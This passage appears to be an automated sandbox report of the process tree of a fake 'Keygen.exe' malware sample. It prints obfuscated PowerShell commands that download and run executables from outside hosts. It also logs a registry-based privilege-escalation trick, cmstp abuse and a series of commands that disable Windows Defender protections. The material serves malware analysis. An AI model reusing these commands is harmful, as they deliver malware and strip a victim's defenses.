powershell.exe nrp.exe PID 3552 wrote to memory of 3540 3552 powershell.exe tnz.exe PID 3552 wrote to memory of 3540 3552 powershell.exe tnz.exe PID 3552 wrote to memory of 3540 3552 powershell.exe tnz.exe PID 1584 wrote to memory of 1632 1584 nrp.exe FGbfttrev.exe PID 1584 wrote to memory of 1632 1584 nrp.exe FGbfttrev.exe PID 1584 wrote to memory of 1632 1584 nrp.exe FGbfttrev.exe PID 1584 wrote to memory of 4260 1584 nrp.exe FDvbcgfert.exe PID 1584 wrote to memory of 4260 1584 nrp.exe FDvbcgfert.exe PID 1584 wrote to memory of 4260 1584 nrp.exe FDvbcgfert.exe PID 1584 wrote to memory of 4780 1584 nrp.exe nrp.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.exePID:4776"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exePID:3488C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"Modifies registry classSuspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\Keygen.exePID:3224Keygen.exeExecutes dropped EXESuspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exePID:3464"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:1108"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""Blocklisted process makes network requestSuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeTokenSuspicious use of WriteProcessMemory
-
C:\Users\Public\nrp.exePID:1584"C:\Users\Public\nrp.exe"Executes dropped EXESuspicious use of SetThreadContextSuspicious behavior: MapViewOfSectionSuspicious use of SetWindowsHookExSuspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exePID:1632"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"Executes dropped EXESuspicious use of SetThreadContextSuspicious behavior: MapViewOfSectionSuspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exePID:4232"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"Executes dropped EXESuspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exePID:4260"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"Executes dropped EXESuspicious use of SetThreadContextSuspicious behavior: MapViewOfSectionSuspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exePID:4928"C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"Executes dropped EXELoads dropped DLLSuspicious use of NtSetInformationThreadHideFromDebuggerChecks processor information in registry
-
C:\Windows\SysWOW64\cmd.exePID:4544"C:\Windows\System32\cmd.exe" /c taskkill /pid 4928 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\873985410469049\\* & exit
-
C:\Windows\SysWOW64\taskkill.exePID:1368taskkill /pid 4928Kills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Users\Public\nrp.exePID:4780"C:\Users\Public\nrp.exe"Executes dropped EXELoads dropped DLLDrops desktop.ini file(s)Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\s87WswzUoo.exePID:180"C:\Users\Admin\AppData\Local\Temp\s87WswzUoo.exe"Executes dropped EXESuspicious use of SetThreadContextSuspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\s87WswzUoo.exePID:4580"C:\Users\Admin\AppData\Local\Temp\s87WswzUoo.exe"Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\9yX7jXtPyr.exePID:4620"C:\Users\Admin\AppData\Local\Temp\9yX7jXtPyr.exe"Executes dropped EXEAdds Run key to start applicationSuspicious use of SetThreadContextModifies system certificate store
-
C:\Windows\SysWOW64\svchost.exePID:5396"C:\Windows\System32\svchost.exe"
-
C:\Windows\SysWOW64\cmd.exePID:1772C:\Windows\system32\cmd.exe /c ""C:\Users\Public\vAsFptso.bat" "
-
C:\Windows\SysWOW64\reg.exePID:340reg delete hkcu\Environment /v windir /fModifies registry key
-
C:\Windows\SysWOW64\reg.exePID:5624reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "Modifies registry key
-
C:\Windows\SysWOW64\cmd.exePID:5640C:\Windows\system32\cmd.exe /c ""C:\Users\Public\vAsFptso.bat" "
-
C:\Program Files (x86)\internet explorer\ieinstal.exePID:3740"C:\Program Files (x86)\internet explorer\ieinstal.exe"
-
C:\Users\Admin\AppData\Local\Temp\rRJ4xmowfr.exePID:3236"C:\Users\Admin\AppData\Local\Temp\rRJ4xmowfr.exe"Executes dropped EXESuspicious use of SetThreadContextSuspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\rRJ4xmowfr.exePID:4592"C:\Users\Admin\AppData\Local\Temp\rRJ4xmowfr.exe"Executes dropped EXESuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeTokenSuspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exePID:3508"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\fdbd2kvq.inf
-
C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exePID:3948"C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exe"Executes dropped EXESuspicious use of SetThreadContextSuspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exePID:1180"C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exe"Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exePID:1532"C:\Users\Admin\AppData\Local\Temp\2YYlGiVB3V.exe"Executes dropped EXEWindows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:508"powershell" Get-MpPreference -verboseSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exePID:1860cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\nrp.exe"
-
C:\Windows\SysWOW64\timeout.exePID:3956timeout /T 10 /NOBREAKDelays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exePID:4156"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:608"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""Suspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exePID:4432timeout 1Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exePID:1892"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:4452"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""Blocklisted process makes network requestSuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeTokenSuspicious use of WriteProcessMemory
-
C:\Users\Public\xso.exePID:2332"C:\Users\Public\xso.exe"Executes dropped EXESuspicious use of SetThreadContextSuspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exePID:5288"C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"Executes dropped EXESuspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exePID:5904"C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"Executes dropped EXESuspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exePID:4808"{path}"Executes dropped EXELoads dropped DLLChecks processor information in registry
-
C:\Windows\SysWOW64\cmd.exePID:2436"C:\Windows\System32\cmd.exe" /c taskkill /pid 4808 & erase C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe & RD /S /Q C:\\ProgramData\\770191126041014\\* & exit
-
C:\Windows\SysWOW64\taskkill.exePID:4504taskkill /pid 4808Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exePID:4024"{path}"Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\azchgftrq.exePID:1468"{path}"Executes dropped EXE
-
C:\Users\Public\xso.exePID:5304"{path}"Executes dropped EXELoads dropped DLLDrops desktop.ini file(s)
-
C:\Users\Admin\AppData\Local\Temp\BQ50kvtGsn.exePID:6000"C:\Users\Admin\AppData\Local\Temp\BQ50kvtGsn.exe"Executes dropped EXESuspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\BQ50kvtGsn.exePID:3528"C:\Users\Admin\AppData\Local\Temp\BQ50kvtGsn.exe"Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\VVa1pEtZCG.exePID:6060"C:\Users\Admin\AppData\Local\Temp\VVa1pEtZCG.exe"Executes dropped EXESuspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exePID:1996"C:\Windows\System32\svchost.exe"
-
C:\Windows\SysWOW64\cmd.exePID:3908C:\Windows\system32\cmd.exe /c ""C:\Users\Public\ekQngtso.bat" "
-
C:\Windows\SysWOW64\reg.exePID:5664reg delete hkcu\Environment /v windir /fModifies registry key
-
C:\Windows\SysWOW64\reg.exePID:1588reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exePID:2920schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
-
C:\Windows\SysWOW64\reg.exePID:2260reg delete hkcu\Environment /v windir /fModifies registry key
-
C:\Windows\SysWOW64\cmd.exePID:5728C:\Windows\system32\cmd.exe /c ""C:\Users\Public\ekQngtso.bat" "
-
C:\Program Files (x86)\internet explorer\ieinstal.exePID:4496"C:\Program Files (x86)\internet explorer\ieinstal.exe"
-
C:\Users\Admin\AppData\Local\Temp\qNP7mU6QPh.exePID:6092"C:\Users\Admin\AppData\Local\Temp\qNP7mU6QPh.exe"Executes dropped EXESuspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\qNP7mU6QPh.exePID:3564"C:\Users\Admin\AppData\Local\Temp\qNP7mU6QPh.exe"Executes dropped EXESuspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exePID:2244"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\2k2rvo42.inf
-
C:\Users\Admin\AppData\Local\Temp\ho25uMdeM0.exePID:4040"C:\Users\Admin\AppData\Local\Temp\ho25uMdeM0.exe"Executes dropped EXESuspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ho25uMdeM0.exePID:3596"C:\Users\Admin\AppData\Local\Temp\ho25uMdeM0.exe"Executes dropped EXEWindows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:5960"powershell" Get-MpPreference -verbose
-
C:\Windows\SysWOW64\cmd.exePID:2072cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\xso.exe"
-
C:\Windows\SysWOW64\timeout.exePID:192timeout /T 10 /NOBREAKDelays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exePID:2008"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:4548"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""Suspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exePID:2388timeout 2Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exePID:3604"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:3552"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""Blocklisted process makes network requestSuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeTokenSuspicious use of WriteProcessMemory
-
C:\Users\Public\tnz.exePID:3540"C:\Users\Public\tnz.exe"Executes dropped EXESuspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exePID:4684"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\8EA9.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePID:2100"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""Suspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\werfault.exePID:4428werfault.exe /h /shared Global\e327712778b74a85855d5a9748411b6c /t 3232 /p 3224Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\werfault.exePID:4640werfault.exe /h /shared Global\de5b817df55c49bdb250dbaf57724c42 /t 3232 /p 3224
-
C:\Windows\SysWOW64\DllHost.exePID:4080C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
-
C:\Windows\SysWOW64\cmd.exePID:208cmd /c start C:\Windows\temp\ddad3vxa.exe
-
C:\Windows\temp\ddad3vxa.exePID:4504C:\Windows\temp\ddad3vxa.exeExecutes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:4188"powershell" Get-MpPreference -verboseSuspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:4784"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $trueSuspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:1776"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $trueSuspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:3132"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $trueSuspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:1292"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $trueSuspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:4064"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $trueSuspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:768"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -ForceSuspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:4624"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:944"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:372"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:1536"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:2872"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $trueSuspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:4552"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exePID:804taskkill /IM cmstp.exe /FKills process with taskkillSuspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exePID:4980cmd /c start C:\Windows\temp\ttuqy3sf.exe
-
C:\Windows\temp\ttuqy3sf.exePID:5568C:\Windows\temp\ttuqy3sf.exeExecutes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:4364"powershell" Get-MpPreference -verbose
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:3548"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:1620"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:1236"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:1616"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:4560"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:3408"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:1212"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePID:3560"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
-
